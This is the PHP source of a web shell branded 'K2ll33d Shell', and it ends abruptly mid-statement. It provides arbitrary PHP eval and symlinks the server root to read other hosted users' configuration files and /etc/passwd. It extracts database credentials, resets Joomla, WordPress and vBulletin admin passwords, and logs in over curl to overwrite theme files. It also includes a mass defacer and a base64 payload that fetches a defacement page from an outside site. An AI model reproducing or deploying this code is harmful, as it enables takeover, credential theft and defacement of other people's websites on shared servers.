 <div id="menu"><ul class="menu"><a href="?<?php echo "y=".$pwd;?>">Files</a><a href="?<?php echo "y=".$pwd;?>&amp;x=shell">Shell</a><a href="?<?php echo "y=".$pwd;?>&amp;x=upload">upload</a><li><a>Sym</a><ul><li><a href="?<?php echo "y=".$pwd;?>&amp;x=sf">Symlink File</a></li><li><a href="?<?php echo "y=".$pwd;?>&amp;x=sec">Symlink server</a></li><li><a href="?<?php echo "y=".$pwd;?>&amp;x=configs">Get configs</a></li></ul></li><a href="?<?php echo "y=".$pwd;?>&amp;x=php">Eval</a><a href="?<?php echo "y=".$pwd;?>&amp;x=back">Remote</a><a href="?<?php echo "y=".$pwd;?>&amp;x=mysql">Sql</a><a href="?<?php echo "y=".$pwd;?>&amp;x=mass">Mass</a><a href="?<?php echo "y=".$pwd;?>&amp;x=brute">Brute</a><a href="?<?php echo "y=".$pwd;?>&amp;x=phpinfo">PHP</a><a href="?<?php echo "y=".$pwd;?>&amp;x=zone-h">Zone-H</a><li><a>Joomla</a><ul><li><a href="?<?php echo "y=".$pwd;?>&amp;x=joomla">From keyboard</a></li><li><a href="?<?php echo "y=".$pwd;?>&amp;x=js">From symlink</a></li></ul></li><li><a>Wordpress</a><ul><li><a href="?<?php echo "y=".$pwd;?>&amp;x=keyboard">From Keyboard</a></li><li><a href="?<?php echo "y=".$pwd;?>&amp;x=config">From Symlink</a></li></ul></li><a href="?<?php echo "y=".$pwd;?>&amp;x=vb">Vb</a><a href="?<?php echo "y=".$pwd;?>&amp;x=domains">Domains</a><a href="?<?php echo "y=".$pwd;?>&amp;x=string">String</a><a href="?<?php echo "y=".$pwd;?>&amp;x=boom">Boom</a>&nbsp;&nbsp;</ul></div><br><br>
 <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){?><form action="?y=<?php echo $pwd;?>&amp;x=php" method="post"><table class="cmdbox"><tr><td><textarea class="output" name="cmd" id="cmd" cols=90>
 <?php if(isset($_POST['submitcmd'])) {echo eval(magicboom($_POST['cmd']));}else echo "echo file_get_contents('/etc/passwd');";?></textarea></td></tr><tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Do !" name="submitcmd" /></td></tr></form></table></form> <?php }
 elseif(isset($_GET['x']) && ($_GET['x'] == 'about')){echo '<center><br><br><div class="mybox"><br><h2 style="font-size:50px;" class="k2ll33d2">K2ll33d Shell</h2><k>By K2ll33d<br><br><br><a href=mailto:k2ll33d@live.fr>Mail</a>&nbsp;|&nbsp;<a href="http://facebook.com/k2ll33d" target="_blank">Facebook</a>&nbsp;|&nbsp;<a href="http://zone-h.org/archive/notifier=ReZK2LL" target="_blank">Zone-H</a></k><br><br><h3 style="font:25px orbitron;color:#ff0000;">'.date('Y').'</h3></div></center>';}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$op =@fopen ('sym/.htaccess','w');fwrite($op ,$htaccess);echo '<center><br><br><br><div class="mybox"><h2 class="k2ll33d2">Symlinker</h2><br><form method="post"> File Path:<br><input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br>Symlink Name<br><input class="inputz" type="text" name="symfile" value="s.txt" size="60"/><br><br><input class="inputzbut" type="submit" value="symlink" name="symlink" /><br><br></form></div></center>';$target = $_POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($symlink) {@symlink("$target","sym/$symfile");echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><br><br><br><br></center>';}}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'js')) {if ($_POST['symjo']) {$config = file_get_contents($_POST['url']);$user = $_POST['user'];$pass = md5($_POST['pass']);function ex($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}if($config && ereg('JConfig',$config)){$psswd = ex($config,'$password = \'',"';");$username = ex($config,'$user = \'',"';");$dbname = ex($config,'$db = \'',"';");$prefix = ex($config,'$dbprefix = \'',"';");$host = ex($config,'$host = \'',"';");$email = ex($config,'$mailfrom = \'',"';");$formn = ex($config,'$fromname = \'',"';");$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");if ($query) {echo '<center><h2 class="k2ll33d2">Done !</h2></center><br><table width="100%"><tr><th width="30%">site name</th><th width="20%">user</th><th width="20%">password</th><th width="20%">email</th></tr><tr><td width="20%"><font size="2" color="red">'.$formn.'</font></td><td width="20%">'.$user.'</td><td with="20%">'.$_POST["pass"].'</td><td width="20%">'.$email.'</td></tr></table>';}else {echo '<h2 class="k2ll33d2"><font color="#ff0000">ERROR !</font></h2>';}}else die('<h2 class="k2ll33d2"><font color="red">Not a joomla config</font></h2>');}else { ?> <center><br><br><div class="mybox"><form method="post"><table><h2 class="k2ll33d2">Joomla login changer ( symlink version )</h2><tr><td>config link : </td><td><input class="inputz" type="text" name="url" value=""></td></tr><tr><td>new user : </td><td><input class="inputz" type="text" name="user" value="admin"></td></tr><tr><td>new password : </td><td><input class="inputz" type="text" name="pass" value="123123"></td></tr><tr><td><br></td></tr><tr><td><input type="submit" class="inputzbut" name="symjo" value="change"></td><br></tr></table></form></div></center><?php }}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'sec')){$d0mains = @file("/etc/named.conf");
 if($d0mains){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
 DirectoryIndex Sux.html
 AddType text/plain .php
 AddHandler server-parsed .php
 AddType text/plain .html
 AddHandler txt .html
 Require None
 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all
  DirectoryIndex Sux.html
  AddType text/plain .php
  AddHandler server-parsed .php
  AddType text/plain .html
  AddHandler txt .html
  Require None
  Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
  DirectoryIndex Sux.html
  AddType text/plain .php
  AddHandler server-parsed .php
  AddType text/plain .html
  AddHandler txt .html
  Require None
  Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></div></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')){error_reporting(0);?><center><br><br><div class="mybox"><h2 class="k2ll33d2">Folder Mass Defacer</h2><center/><br><center><form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=post>Folder :<br/><input class="inputz" typ=text name=path size=60 value="<?=getcwd();?>"><br>File Name :<br/><input class="inputz" typ=text name=file size=60 value="index.php"><br>index URL :<br/><input class="inputz" typ=text name=url size=60 value=""><br><input class="inputzbut" type=submit value=Deface></form></div></center><?php @error_reporting(0);$mainpath=$_POST[path];$file=$_POST[file];$indexurl=$_POST[url];echo "<br>";$dir=opendir("$mainpath");while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$code=@file_get_contents($indexurl);$finish=@fwrite($start,$code);if ($finish){echo "&#187; $row/$file &#187; Done<br><br>";}}}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) {if(empty($_POST['index'])){echo "<center><br><br><div width='100%' class='mybox'><br><h2 class='k2ll33d2'>Vbulletin index changer</h2><br><FORM method='POST'>host : <INPUT size='12' class='inputz' value='localhost' name='localhost' type='text'>&nbsp;|&nbsp;database : <INPUT class='inputz' size='12' value='db_name' name='database' type='text'>&nbsp;|&nbsp;username : <INPUT class='inputz' size='10' value='db_user' name='username' type='text'>&nbsp;|&nbsp;password : <INPUT class='inputz' size='10' value='bd_pass' name='password' type='text'>&nbsp;|&nbsp;perfix : <input class='inputz' size='10' value='' name='perfix' type='text'><br><br><textarea class='inputz' name='index' cols='40' rows='10'>Hacked By ReZK2LL Team</textarea><br><INPUT class='inputzbut' value='Deface' name='send' type='submit'></FORM></div></center>";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$perfix = $_POST['perfix'];$index = $_POST['index'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";$set_index .= base64_encode("echo '$index';");$set_index .= "\'))}}{\${exit()}}</textarea>";$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());if($ok){echo "Defaced<br><br>";}}}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'boom')){error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo 